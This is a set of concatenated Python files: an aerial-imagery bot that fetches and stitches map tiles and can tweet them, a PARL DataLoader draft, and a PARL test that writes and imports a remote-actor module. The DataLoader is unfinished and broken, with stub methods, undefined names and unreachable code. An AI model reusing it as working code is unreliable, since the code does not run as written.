https://wiki.openstreetmap.org/wiki/Slippy_map_tilenames#Resolution_and_Scale
"""
assert width > 0 and height > 0
meters_per_degree = (EARTH_CIRCUMFERENCE / 360)
width_geo = width / (meters_per_degree * math.cos(math.radians(geopoint.lat)))
height_geo = height / meters_per_degree
southwest = GeoPoint(geopoint.lat - height_geo / 2, geopoint.lon - width_geo / 2)
northeast = GeoPoint(geopoint.lat + height_geo / 2, geopoint.lon + width_geo / 2)
return cls(southwest, northeast)
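# Example of the latitude correction (illustration only): one degree of
# longitude spans ~111319 m at the equator but only ~55660 m at 60° N, so a
# 1000 m wide rectangle covers ~0.009° of longitude at the equator and
# ~0.018° at 60° N; the height in degrees is the same at both latitudes.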
class GeoShape:
"""
This class is where shapefiles (of the form detailed in the config example,
i.e. containing one layer with one polygon shape with lon/lat coordinates)
are loaded and queried. Note that shapefiles use (lon, lat) coordinates,
which are sequestered to this class only.
"""
def __init__(self, shapefile_path):
sf = shapefile.Reader(shapefile_path)
shapes = sf.shapes()
assert len(shapes) == 1
assert shapes[0].shapeTypeName == 'POLYGON'
self.outline = shapes[0]
def contains(self, geopoint):
"""Does the shape contain the point?"""
point = geopoint.to_shapely_point()
polygon = shapely.geometry.shape(self.outline)
return polygon.contains(point)
def random_geopoint(self):
"""
A random geopoint, using rejection sampling to make sure it's
contained within the shape.
"""
bounds = GeoRect.from_shapefile_bbox(self.outline.bbox)
geopoint = GeoPoint.random(bounds)
i = 0
while not self.contains(geopoint):
i += 1
if i > 250:
raise ValueError("cannot seem to find a point in the shape's bounding box that's within the shape – is your data definitely okay (it may well be if it's a bunch of spread-out islands)? if you're sure, you'll need to raise the iteration limit in this function")
geopoint = GeoPoint.random(bounds)
return geopoint
class MapTileStatus:
"""An enum type used to keep track of the current status of map tiles."""
PENDING = 1
CACHED = 2
DOWNLOADING = 3
DOWNLOADED = 4
ERROR = 5
class MapTile:
"""
A map tile: coordinates and, if it's been downloaded yet, image, plus some
housekeeping stuff.
"""
# static class members set based on the configuration
tile_path_template = None
tile_url_template = None
def __init__(self, zoom, x, y):
self.zoom = zoom
self.x = x
self.y = y
# initialize the other variables
self.status = MapTileStatus.PENDING
self.image = None
self.filename = None
if (MapTile.tile_path_template):
self.filename = MapTile.tile_path_template.format(zoom=self.zoom, x=self.x, y=self.y)
def __repr__(self):
return f"MapTile({self.zoom}, {self.x}, {self.y})"
def zoomed(self, zoom_delta):
"""
Returns a MapTileGrid of the area covered by this map tile, but zoomed
by zoom_delta. This works this way because by increasing the zoom level
by 1, a tile's area is subdivided into 4 quadrants.
"""
zoom = self.zoom + zoom_delta
fac = (2 ** zoom_delta)
return MapTileGrid([[MapTile(zoom, self.x * fac + x, self.y * fac + y)
for y in range(0, fac)]
for x in range(0, fac)])
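# For example, MapTile(10, 5, 7).zoomed(1) yields a 2x2 MapTileGrid covering
# the tiles (11, 10, 14), (11, 10, 15), (11, 11, 14) and (11, 11, 15).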
def load(self):
"""Loads the image either from cache or initiates a download."""
if self.filename is None:
self.download()
else:
# check if already downloaded in tile store, otherwise download
try:
self.image = Image.open(self.filename)
self.image.load()
self.status = MapTileStatus.CACHED
except IOError:
self.download()
def download(self):
"""
Downloads a tile image. Sets the status to ERROR if things don't work
out for whatever reason. Finally, writes the image to the cache if
enabled.
"""
self.status = MapTileStatus.DOWNLOADING
try:
url = MapTile.tile_url_template.format(x=self.x, y=self.y, zoom=self.zoom)
r = requests.get(url, headers={'User-Agent': USER_AGENT})
except requests.exceptions.ConnectionError:
self.status = MapTileStatus.ERROR
return
# error handling (note that a warning is appropriate here – if this tile
# is one of the tiles used in imagery quality testing, an error is not an
# unexpected outcome and should thus not be thrown)
if r.status_code != 200:
LOGGER.warning(f"Unable to download {self}, status code {r.status_code}.")
self.status = MapTileStatus.ERROR
return
# convert response into an image
data = r.content
self.image = Image.open(io.BytesIO(data))
# sanity check
assert self.image.mode == "RGB"
assert self.image.size == (TILE_SIZE, TILE_SIZE)
# save original data (not: re-encoded via image.save) in tile store if
# enabled (and create the directory first if it doesn't already exist)
if self.filename is not None:
d = os.path.dirname(self.filename)
if not os.path.isdir(d):
os.makedirs(d)
with open(self.filename, 'wb') as f:
f.write(data)
self.status = MapTileStatus.DOWNLOADED
class ProgressIndicator:
"""
Displays and updates a progress indicator during tile download. Designed
to run in a separate thread, polling for status updates frequently.
"""
def __init__(self, maptilegrid):
self.maptilegrid = maptilegrid
def update_tile(self, maptile):
"""
Updates a single tile depending on its state: pending tiles are grayish,
cached tiles are blue, downloading tiles are yellow, successfully
downloaded tiles are green, and tiles with errors are red. For each
tile, two characters are printed – in most fonts, this is closer to a
square than a single character. See https://stackoverflow.com/a/39452138
for color escapes.
"""
def p(s): print(s + "\033[0m", end='')
if maptile.status == MapTileStatus.PENDING:
p("░░")
elif maptile.status == MapTileStatus.CACHED:
p("\033[34m" + "██")
elif maptile.status == MapTileStatus.DOWNLOADING:
p("\033[33m" + "▒▒")
elif maptile.status == MapTileStatus.DOWNLOADED:
p("\033[32m" + "██")
elif maptile.status == MapTileStatus.ERROR:
p("\033[41m\033[37m" + "XX")
def update_text(self):
"""
Displays percentage and counts only.
"""
cached = 0
downloaded = 0
errors = 0
for maptile in self.maptilegrid.flat():
if maptile.status == MapTileStatus.CACHED:
cached += 1
elif maptile.status == MapTileStatus.DOWNLOADED:
downloaded += 1
elif maptile.status == MapTileStatus.ERROR:
errors += 1
done = cached + downloaded
total = self.maptilegrid.width * self.maptilegrid.height
percent = int(10 * (100 * done / total)) / 10
details = f"{done}/{total}"
if cached:
details += f", {cached} cached"
if downloaded:
details += f", {downloaded} downloaded"
if errors:
details += f", {errors} error"
if errors > 1:
details += "s"
# need a line break after it so that the first line of the next
# iteration of the progress indicator starts at col 0
print(f"{percent}% ({details})")
def update(self):
"""Updates the progress indicator."""
# if normal verbosity is selected, don't do anything fancy
if VERBOSITY == "normal":
self.update_text()
return
for y in range(self.maptilegrid.height):
for x in range(self.maptilegrid.width):
maptile = self.maptilegrid.at(x, y)
self.update_tile(maptile)
print() # line break
self.update_text()
# move cursor back up to the beginning of the progress indicator for
# the next iteration, see
# http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/x361.html
print(f"\033[{self.maptilegrid.height + 1}A", end='')
def loop(self):
"""Main loop."""
if VERBOSITY == "quiet":
return
while any([maptile.status is MapTileStatus.PENDING or
maptile.status is MapTileStatus.DOWNLOADING
for maptile in self.maptilegrid.flat()]):
self.update()
time.sleep(0.1)
self.update() # final update to show that we're all done
def cleanup(self):
"""Moves the cursor back to the bottom after completion."""
if VERBOSITY == "quiet" or VERBOSITY == "normal":
return
print(f"\033[{self.maptilegrid.height}B")
class MapTileGrid:
"""
A grid of map tiles, kept as a nested list such that indexing works via
[x][y]. Manages the download and stitching of map tiles into a preliminary
result image.
"""
def __init__(self, maptiles):
self.maptiles = maptiles
self.width = len(maptiles)
self.height = len(maptiles[0])
self.image = None
def __repr__(self):
return f"MapTileGrid({self.maptiles})"
@classmethod
def from_georect(cls, georect, zoom):
"""Divides a GeoRect into a grid of map tiles."""
southwest = georect.sw.to_maptile(zoom)
northeast = georect.ne.to_maptile(zoom)
maptiles = []
for x in range(southwest.x, northeast.x + 1):
col = []
# it's correct to have northeast and southwest reversed here (with
# regard to the outer loop) since the y axis of the tile coordinates
# points toward the south, while the latitude axis points due north
for y in range(northeast.y, southwest.y + 1):
maptile = MapTile(zoom, x, y)
col.append(maptile)
maptiles.append(col)
return cls(maptiles)
def at(self, x, y):
"""Accessor with wraparound for negative values: x/y<0 => x/y+=w/h."""
if x < 0:
x += self.width
if y < 0:
y += self.height
return self.maptiles[x][y]
def flat(self):
"""Returns the grid as a flattened list."""
return [maptile for col in self.maptiles for maptile in col]
def has_high_quality_imagery(self):
"""
Checks if the corners of the grid are available two levels more zoomed
in, which should make sure that we're getting high-quality imagery at
the original zoom level.
"""
zoom_delta = 2
# since the at() function wraps around, [self.at(x, y) for x and y in
# [0,-1]] selects the four corners of the grid, then for each of them a
# "subgrid" is generated using .zoomed(), and for each of them, the
# relevant corner is accessed through reuse of x and y
corners = [self.at(x, y).zoomed(zoom_delta).at(x, y) for x in [0, -1] for y in [0, -1]]
# check if they have all downloaded successfully
all_good = True
for c in corners:
c.load()
if c.status == MapTileStatus.ERROR:
all_good = False
break
return all_good
def download(self):
"""
Downloads the constituent tiles using a threadpool for performance
while updating the progress indicator.
"""
# set up progress indicator
prog = ProgressIndicator(self)
prog_thread = threading.Thread(target=prog.loop)
prog_thread.start()
# shuffle the download order of the tiles, this serves no actual purpose
# but it makes the progress indicator look really cool!
tiles = self.flat()
random.shuffle(tiles)
# download tiles using threadpool (2-10 times faster than
# [maptile.load() for maptile in self.flat()]), see
# https://docs.python.org/dev/library/concurrent.futures.html#threadpoolexecutor-example
threads = max(self.width, self.height)
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
{executor.submit(maptile.load): maptile for maptile in tiles}
# retry failed downloads if fewer than 2% of tiles are missing (happens
# frequently when pulling from naver map)
missing_tiles = [maptile for maptile in self.flat() if maptile.status == MapTileStatus.ERROR]
if 0 < len(missing_tiles) < 0.02 * len(self.flat()):
if VERBOSITY != "quiet":
print("Retrying missing tiles...")
for maptile in missing_tiles:
maptile.load()
# finish up progress indicator
prog_thread.join()
prog.cleanup()
# check if we've got everything now
missing_tiles = [maptile for maptile in self.flat() if maptile.status == MapTileStatus.ERROR]
if missing_tiles:
raise RuntimeError(f"unable to load one or more map tiles: {missing_tiles}")
def stitch(self):
"""
Stitches the tiles together. Must not be called before all tiles have
been loaded.
"""
image = Image.new('RGB', (self.width * TILE_SIZE, self.height * TILE_SIZE))
for x in range(0, self.width):
for y in range(0, self.height):
image.paste(self.maptiles[x][y].image, (x * TILE_SIZE, y * TILE_SIZE))
self.image = image
class MapTileImage:
"""Image cropping, resizing and enhancement."""
def __init__(self, image):
self.image = image
def save(self, path, quality=90):
self.image.save(path, quality=quality)
def crop(self, zoom, georect):
"""
Crops the image such that it really only covers the area within the
input GeoRect. This function must only be called once per image.
"""
sw_x, sw_y = WebMercator.project(georect.sw, zoom)
ne_x, ne_y = WebMercator.project(georect.ne, zoom)
# determine what we'll cut off
sw_x_crop = round(TILE_SIZE * (sw_x % 1))
sw_y_crop = round(TILE_SIZE * (1 - sw_y % 1))
ne_x_crop = round(TILE_SIZE * (1 - ne_x % 1))
ne_y_crop = round(TILE_SIZE * (ne_y % 1))
# left, top, right, bottom
crop = (sw_x_crop, ne_y_crop, ne_x_crop, sw_y_crop)
# snip snap
self.image = ImageOps.crop(self.image, crop)
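# For example, if the projected south-west corner falls a quarter of the way
# into its tile horizontally (sw_x % 1 == 0.25), then round(256 * 0.25) = 64
# pixels are cropped off the left edge; the other three edges work analogously.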
def scale(self, width, height):
"""
Scales an image. This can distort the image if width and height don't
match the original aspect ratio.
"""
# Image.LANCZOS apparently provides the best quality, see
# https://pillow.readthedocs.io/en/latest/handbook/concepts.html#concept-filters
self.image = self.image.resize((round(width), round(height)), resample=Image.LANCZOS)
def enhance(self):
"""Slightly increases contrast and brightness."""
# these values seem to work well for most images – a more adaptive
# method would be nice, but it's not a priority
contrast = 1.07
brightness = 1.01
self.image = ImageEnhance.Contrast(self.image).enhance(contrast)
self.image = ImageEnhance.Brightness(self.image).enhance(brightness)
class Log:
"""
A simplifying wrapper around the parts of the logging module that are
relevant here, plus some minor extensions. Goal: Logging of warnings
(depending on verbosity level), errors and exceptions on stderr, other
messages (modulo verbosity) on stdout, and everything (independent of
verbosity) in a logfile.
"""
def __init__(self, logfile):
# name and initialize logger
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.DEBUG)
# via https://stackoverflow.com/a/36338212
class LevelFilter(logging.Filter):
def __init__(self, low, high):
self.low = low
self.high = high
logging.Filter.__init__(self)
def filter(self, record):
return self.low <= record.levelno <= self.high
# log errors (and warnings if a higher verbosity level is dialed in) on
# stderr
eh = logging.StreamHandler()
if VERBOSITY == "quiet":
eh.setLevel(logging.ERROR)
else:
eh.setLevel(logging.WARNING)
eh.addFilter(LevelFilter(logging.WARNING, logging.CRITICAL))
stream_formatter = logging.Formatter('%(message)s')
eh.setFormatter(stream_formatter)
self.logger.addHandler(eh)
# log other messages on stdout if verbosity not set to quiet
if VERBOSITY != "quiet":
oh = logging.StreamHandler(stream=sys.stdout)
if VERBOSITY == "deafening":
oh.setLevel(logging.DEBUG)
elif VERBOSITY == "verbose" or VERBOSITY == "normal":
oh.setLevel(logging.INFO)
oh.addFilter(LevelFilter(logging.DEBUG, logging.INFO))
stream_formatter = logging.Formatter('%(message)s')
oh.setFormatter(stream_formatter)
self.logger.addHandler(oh)
# log everything to file independent of verbosity
if logfile is not None:
fh = logging.FileHandler(logfile)
fh.setLevel(logging.DEBUG)
file_formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
fh.setFormatter(file_formatter)
self.logger.addHandler(fh)
def debug(self, s): self.logger.debug(s)
def info(self, s): self.logger.info(s)
def warning(self, s): self.logger.warning(s)
def error(self, s): self.logger.error(s)
def critical(self, s): self.logger.critical(s)
def exception(self, e):
"""
Logging of game-breaking exceptions, based on:
https://stackoverflow.com/a/40428650
"""
e_traceback = traceback.format_exception(e.__class__, e, e.__traceback__)
traceback_lines = []
for line in [line.rstrip('\n') for line in e_traceback]:
traceback_lines.extend(line.splitlines())
for line in traceback_lines:
self.critical(line)
sys.exit(1)
class Tweeter:
"""Basic class for tweeting images, a simple wrapper around tweepy."""
def __init__(self, consumer_key, consumer_secret, access_token, access_token_secret):
# for references, see:
# http://docs.tweepy.org/en/latest/api.html#status-methods
# https://developer.twitter.com/en/docs/tweets/post-and-engage/guides/post-tweet-geo-guide
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
self.api = tweepy.API(auth)
def get_location(self, geopoint):
full_name = ""
country = ""
try:
location = self.api.reverse_geocode(geopoint.lat, geopoint.lon)
if location:
full_name = location[0].full_name
country = location[0].country
except KeyError:
# can apparently sometimes occur if twitter doesn't have geodata
# for the selected location
pass
return (full_name, country)
def upload(self, path):
"""Uploads an image to Twitter."""
return self.api.media_upload(path)
def tweet(self, text, media, geopoint=None):
if geopoint:
self.api.update_status(
text,
media_ids=[media.media_id],
lat=geopoint.lat,
long=geopoint.lon,
display_coordinates=True
)
else:
self.api.update_status(text, media_ids=[media.media_id])
def main():
global VERBOSITY
global LOGGER
# handle potential cli arguments
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--help', action='help', default=argparse.SUPPRESS, help=argparse._('show this help message and exit')) # override default help argument so that only --help (and not -h) can call
parser.add_argument('config_path', metavar='CONFIG_PATH', type=str, nargs='?', default="config.ini", help='config file to use instead of looking for config.ini in the current working directory')
parser.add_argument('-p', '--point', dest='point', metavar='LAT,LON', type=str, help='a point, e.g. \'37.453896,126.446829\', that will override your configuration (if its latitide is negative, option parsing might throw an error – simply write -p="LAT,LON" in that case)') # https://stackoverflow.com/questions/16174992/cant-get-argparse-to-read-quoted-string-with-dashes-in-it
parser.add_argument('-m', '--max-meters-per-pixel', dest='max_meters_per_pixel', metavar='N', type=float, help='a maximum meters per pixel constraint that will override your configuration')
parser.add_argument('-w', '--width', dest='width', metavar='N', type=float, help='width of the depicted area in meters, will override your configuration')
parser.add_argument('-h', '--height', dest='height', metavar='N', type=float, help='height of the depicted area in meters, will override your configuration')
parser.add_argument('--image_width', dest='image_width', metavar='N', type=float, help='width of the result image, will override your configuration (where you can also find an explanation of how this option interacts with the -m, -w, and -h options)')
parser.add_argument('--image_height', dest='image_height', metavar='N', type=float, help='height of the result image, will override your configuration (where you can also find an explanation of how this option interacts with the -m, -w, and -h options)')
args = parser.parse_args()
# load configuration either from config.ini or from a user-supplied file
# (the latter option is handy if you want to run multiple instances of
# ærialbot with different configurations)
config = ConfigObj(args.config_path, unrepr=True)
# first of all, set up logging at the correct verbosity (and make the
# verbosity available globally since it's needed for the progress indicator)
VERBOSITY = config['GENERAL']['verbosity']
logfile = config['GENERAL']['logfile']
LOGGER = Log(logfile)
############################################################################
# copy the configuration into variables for brevity
tile_path_template = config['GENERAL']['tile_path_template']
image_path_template = config['GENERAL']['image_path_template']
tile_url_template = config['GEOGRAPHY']['tile_url_template']
shapefile = config['GEOGRAPHY']['shapefile']
point = config['GEOGRAPHY']['point']
width = config['GEOGRAPHY']['width']
height = config['GEOGRAPHY']['height']
image_width = config['IMAGE']['image_width']
image_height = config['IMAGE']['image_height']
max_meters_per_pixel = config['IMAGE']['max_meters_per_pixel']
apply_adjustments = config['IMAGE']['apply_adjustments']
image_quality = config['IMAGE']['image_quality']
consumer_key = config['TWITTER']['consumer_key']
consumer_secret = config['TWITTER']['consumer_secret']
access_token = config['TWITTER']['access_token']
access_token_secret = config['TWITTER']['access_token_secret']
tweet_text = config['TWITTER']['tweet_text']
include_location_in_metadata = config['TWITTER']['include_location_in_metadata']
# override configured options with values supplied via the cli
if args.point:
point = tuple(map(float, args.point.split(",")))
if args.max_meters_per_pixel:
max_meters_per_pixel = args.max_meters_per_pixel
if args.width:
width = args.width
if args.height:
height = args.height
if args.image_width:
image_width = args.image_width
if args.image_height:
image_height = args.image_height
############################################################################
LOGGER.info("Processing configuration...")
# handle tile url special cases
if tile_url_template == "googlemaps":
tile_url_template = "https://khms2.google.com/kh/v={google_maps_version}?x={x}&y={y}&z={zoom}"
elif tile_url_template == "navermap":
tile_url_template = "https://map.pstatic.net/nrb/styles/satellite/{naver_map_version}/{zoom}/{x}/{y}.jpg?mt=bg"
if "{google_maps_version}" in tile_url_template:
LOGGER.info("Determining current Google Maps version and patching tile URL template...")
# automatic fallback: current as of July 2021, will likely continue
# to work for at least a while
google_maps_version = '904'
try:
google_maps_page = requests.get("https://maps.googleapis.com/maps/api/js", headers={"User-Agent": USER_AGENT}).content
match = re.search(rb"khms0\.googleapis\.com\/kh\?v=([0-9]+)", google_maps_page)
if match:
google_maps_version = match.group(1).decode('ascii')
LOGGER.debug(google_maps_version)
else:
LOGGER.warning(f"Unable to extract current version, proceeding with outdated version {google_maps_version} instead.")
except requests.RequestException as e:
LOGGER.warning(f"Unable to load Google Maps, proceeding with outdated version {google_maps_version} instead.")
tile_url_template = tile_url_template.replace("{google_maps_version}", google_maps_version)
if "{naver_map_version}" in tile_url_template:
LOGGER.info("Determining current Naver Map version and patching tile URL template...")
naver_map_version = requests.get("https://map.pstatic.net/nrb/styles/satellite.json", headers={'User-Agent': USER_AGENT}).json()["version"]
LOGGER.debug(naver_map_version)
tile_url_template = tile_url_template.replace("{naver_map_version}", naver_map_version)
MapTile.tile_path_template = tile_path_template
MapTile.tile_url_template = tile_url_template
# process max_meters_per_pixel setting
if image_width is None and image_height is None:
assert max_meters_per_pixel is not None
elif image_height is None:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (width / image_width)
elif image_width is None:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (height / image_height)
else:
# if both are set, effectively use whatever imposes a tighter constraint
if width / image_width <= height / image_height:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (width / image_width)
else:
max_meters_per_pixel = (max_meters_per_pixel or 1) * (height / image_height)
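    # Worked example for the branch above (hypothetical numbers, not from any
    # configuration): width = 2000 m at image_width = 1000 px gives 2.0 m/px,
    # while height = 1000 m at image_height = 250 px gives 4.0 m/px; 2.0 m/px
    # demands more detail, so the width-derived ratio is the tighter constraint
    # and is the one multiplied by (max_meters_per_pixel or 1).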
# process image width and height for scaling
if image_width is not None or image_height is not None:
if image_height is None:
image_height = height * (image_width / width)
elif image_width is None:
image_width = width * (image_height / height)
# whether to enable or disable tweeting
tweeting = all(x is not None for x in [consumer_key, consumer_secret, access_token, access_token_secret])
############################################################################
if shapefile is None and point is None:
raise RuntimeError("neither shapefile path nor point configured")
elif point is None:
LOGGER.info("Loading shapefile...")
LOGGER.debug(shapefile)
shape = GeoShape(shapefile)
tries = 0
while True:
tries += 1
if tries > 10:
raise RuntimeError("too many retries – maybe there's no internet connection? either that, or your max_meters_per_pixel setting is too low")
if point is None:
LOGGER.info("Generating random point within shape...")
p = shape.random_geopoint()
else:
LOGGER.info("Using configured point instead of shapefile...")
p = GeoPoint(point[0], point[1])
LOGGER.debug(p)
LOGGER.info("Computing required tile zoom level at point...")
zoom = p.compute_zoom_level(max_meters_per_pixel)
LOGGER.debug(zoom)
LOGGER.info("Generating rectangle with your selected width and height around point...")
rect = GeoRect.around_geopoint(p, width, height)
LOGGER.debug(rect)
LOGGER.info("Turning rectangle into a grid of map tiles at the required zoom level...")
grid = MapTileGrid.from_georect(rect, zoom)
LOGGER.debug(grid)
        # no need to check imagery quality if the point was set manually – clearly
# the user won't mind low-quality imagery
if point is not None:
break
LOGGER.info("Checking quality of imagery available for the map tile grid...")
if not grid.has_high_quality_imagery():
LOGGER.info("Not good enough, let's try this again...")
else:
LOGGER.info("Lookin' good, let's proceed!")
break
############################################################################
LOGGER.info("Downloading tiles...")
grid.download()
LOGGER.info("Stitching tiles together into an image...")
grid.stitch()
image = MapTileImage(grid.image)
LOGGER.info("Cropping image to match the chosen area width and height...")
LOGGER.debug((width, height))
image.crop(zoom, rect)
if image_width is not None or image_height is not None:
LOGGER.info("Scaling image...")
LOGGER.debug((image_width, image_height))
image.scale(image_width, image_height)
if apply_adjustments:
LOGGER.info("Enhancing image...")
image.enhance()
LOGGER.info("Saving image to disk...")
image_path = image_path_template.format(
datetime=datetime.today().strftime("%Y-%m-%dT%H.%M.%S"),
latitude=p.lat,
longitude=p.lon,
width=width,
height=height,
max_meters_per_pixel=max_meters_per_pixel,
xmin=grid.at(0, 0).x,
xmax=grid.at(0, 0).x+grid.width,
ymin=grid.at(0, 0).y,
ymax=grid.at(0, 0).y+grid.height,
zoom=zoom,
georect=f"sw{rect.sw.lat},{rect.sw.lon}ne{rect.ne.lat},{rect.ne.lon}"
)
LOGGER.debug(image_path)
d = os.path.dirname(image_path)
if not os.path.isdir(d):
os.makedirs(d)
image.save(image_path, image_quality)
############################################################################
if tweeting:
LOGGER.info("Connecting to Twitter...")
tweeter = Tweeter(consumer_key, consumer_secret, access_token, access_token_secret)
#if "location_full_name" in tweet_text or "location_country" in tweet_text:
LOGGER.info("Getting location information from Twitter...")
(location_full_name, location_country) = tweeter.get_location(p)
LOGGER.debug((location_full_name, location_country))
osm_url = f"https://www.openstreetmap.org/#map={zoom}/{p.lat}/{p.lon}"
googlemaps_url = f"https://www.google.com/maps/@{p.lat},{p.lon},{zoom}z"
LOGGER.info("Uploading image to Twitter...")
media = tweeter.upload(image_path)
LOGGER.info("Sending tweet...")
tweet_text = tweet_text.format(
latitude=p.lat,
longitude=p.lon,
point_fancy=p.fancy(),
osm_url=osm_url,
googlemaps_url=googlemaps_url,
location_full_name=location_full_name,
location_country=location_country
)
LOGGER.debug(tweet_text)
if include_location_in_metadata:
tweeter.tweet(tweet_text, media, p)
else:
tweeter.tweet(tweet_text, media)
LOGGER.info("All done!")
if __name__ == "__main__":
# log all exceptions
try:
main()
except Exception as e:
LOGGER.exception(e)
|
dataloader.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from queue import Queue
from threading import Lock, Thread
import paddle.fluid as fluid
from paddle.fluid.reader import DataLoader as FluidDataLoader
from ..utils import data_server
logger = logging.getLogger(__name__)
class Record(object):
def __init__(self):
self.record_no = -1
        self.data = None
class DataLoader(object):
    def __init__(self,
                 reader_cls,
file_list,
feed_list=None,
places=None,
return_list=False,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
"""
Reader_cls is the class name of dataset.See example in dataset.py
file_list is the input data file list and it should be get by loader.For example, all data
file is on local or on hdfs.
This class:
1. get data file list from the leader.
2. parse records from reader_cls' object.
3. if there's no data local, try to pull data from other dataserver or raise StopIteration.
"""
        self._name = fluid.unique_name.generate("_dataloader_")
        self._loader = FluidDataLoader()
        self._start_data_server()
        # to control the cache size (the maxsize used here is a placeholder default).
        self._data_queue = Queue(maxsize=64)
        # local record cache and the queue of sub data sets assigned by the data
        # server; both are consumed in _read_data below.
        self._data = {}
        self._sub_data_set = Queue()
        self._lock = Lock()
        self._file_list = file_list
        self._reader_cls = reader_cls
        # reader_cls is expected to be a DataReader subclass (see dataset.py).
        assert issubclass(reader_cls, DataReader)
        self._t_read_data = Thread(target=self._read_data)
        self._t_read_data.start()
def _start_data_server(self):
"""
start and register the data server
"""
        self._data_server = data_server.DataServer()
pass
def __iter__(self):
"""
get data from queue
"""
pass
def __next__(self):
pass
def _get_one_data_file(self):
pass
def _get_data(self):
"""
get data from queue
"""
pass
def _get_file_key(self, idx, file_path):
return "idx:{}_path:{}".format(idx, file_path)
return key
def _read_data(self):
"""
read data into queue
"""
while True:
file_data_set = self._sub_data_set.get()
if file_data_set is None:
logger.info("terminated exit!")
break
rec_map = {}
for one_range in file_data_set.filtered_records:
for rec_no in range(one_range.begin, one_range.end + 1):
                    rec_map[rec_no] = one_range.status
for rec_no, data in enumerate(
self._reader_cls(file_data_set.file_path)):
if rec_no in rec_map and rec_map[
                        rec_no] == RecordStatus.PROCESSED:
continue
logger.debug("read rec_no:{} data_len:{}".format(rec_no,
len(data)))
                self._data_queue.put(1, block=True)  # blocks when the cache is full, bounding memory use
key = self._get_file_key(file_data_set.idx_in_list,
file_data_set.file_path)
with self._lock:
if key not in self._data:
self._data[key] = {}
self._data[key][rec_no] = data
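# Hedged usage sketch (illustrative only; the methods above are still stubs and
# the reader class name below is a placeholder, not part of this module):
#
#     loader = DataLoader(MyDataReader, ["part-00000", "part-00001"],
#                         batch_size=32, shuffle=True)
#     for record in loader:
#         ...  # feed the record into the training program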
|
locate_remote_file_test_alone.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import shutil
import unittest
import parl
import os
import sys
import time
import threading
from six.moves import queue
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.remote.client import disconnect
from parl.remote import exceptions
from parl.utils import logger, get_free_tcp_port
class TestCluster(unittest.TestCase):
def tearDown(self):
disconnect()
def _write_remote_actor_to_file(self, file_path):
with open(file_path, 'w') as f:
f.write('''\
import parl
@parl.remote_class
class Actor(object):
    def __init__(self):
        pass
    def add_one(self, x):
        return x + 1
''')
def _gen_remote_class_in_absolute_path(self, file_name):
# E.g.: /A/B/C/test.py
cur_dir = os.getcwd() # /A/B/C
parent_dir = os.path.split(cur_dir)[0] # /A/B
# /A/B/parl_unittest_abs_dir
abs_dir = os.path.join(parent_dir,
"parl_unittest_abs_dir_{}".format(time.time()))
if os.path.exists(abs_dir):
logger.warning("removing directory: {}".format(abs_dir))
shutil.rmtree(abs_dir)
os.mkdir(abs_dir)
file_path = os.path.join(abs_dir, file_name)
self._write_remote_actor_to_file(file_path)
logger.info("create file: {}".format(file_path))
return abs_dir
def _gen_remote_class_in_relative_path(self, file_name):
relative_dir = "../parl_unittest_relative_dir_{}".format(time.time())
if os.path.exists(relative_dir):
logger.warning("removing directory: {}".format(relative_dir))
shutil.rmtree(relative_dir)
os.mkdir(relative_dir)
file_path = os.path.join(relative_dir, file_name)
self._write_remote_actor_to_file(file_path)
logger.info("create file: {}".format(file_path))
return relative_dir
def test_locate_remote_file_with_absolute_env_path(self):
port = get_free_tcp_port()
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
parl.connect('localhost:{}'.format(port))
abs_dir = self._gen_remote_class_in_absolute_path("abs_actor.py")
sys.path.append(abs_dir) # add absolute environment path
import abs_actor
actor = abs_actor.Actor()
self.assertEqual(actor.add_one(1), 2)
shutil.rmtree(abs_dir)
sys.path.remove(abs_dir)
master.exit()
worker1.exit()
def test_locate_remote_file_with_absolute_env_path_in_multi_threads(self):
port = get_free_tcp_port()
master = Master(port=port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:{}'.format(port), 10)
for _ in range(3):
if master.cpu_num == 10:
break
time.sleep(10)
self.assertEqual(10, master.cpu_num)
parl.connect('localhost:{}'.format(port))
abs_dir = self._gen_remote_class_in_absolute_path("abs_actor2.py")
sys.path.append(abs_dir) # add absolute environment path
import abs_actor2
def run(q):
try:
actor = abs_actor2.Actor()
self.assertEqual(actor.add_one(1), 2)
except Exception as e:
q.put(False)
raise e
q.put(True)
result = queue.Queue()
threads = []
for _ in range(10):
th = threading.Thread(target=run, args=(result, ))
th.start()
threads.append(th)
for th in threads:
th.join()
no_exception = result.get()
assert no_exception
shutil.rmtree(abs_dir)
sys.path.remove(abs_dir)
master.exit()
worker1.exit()
def test_locate_remote_file_with_relative_env_path_without_distributing_files(
self):
port = get_free_tcp_port()
master = Master(port=port)
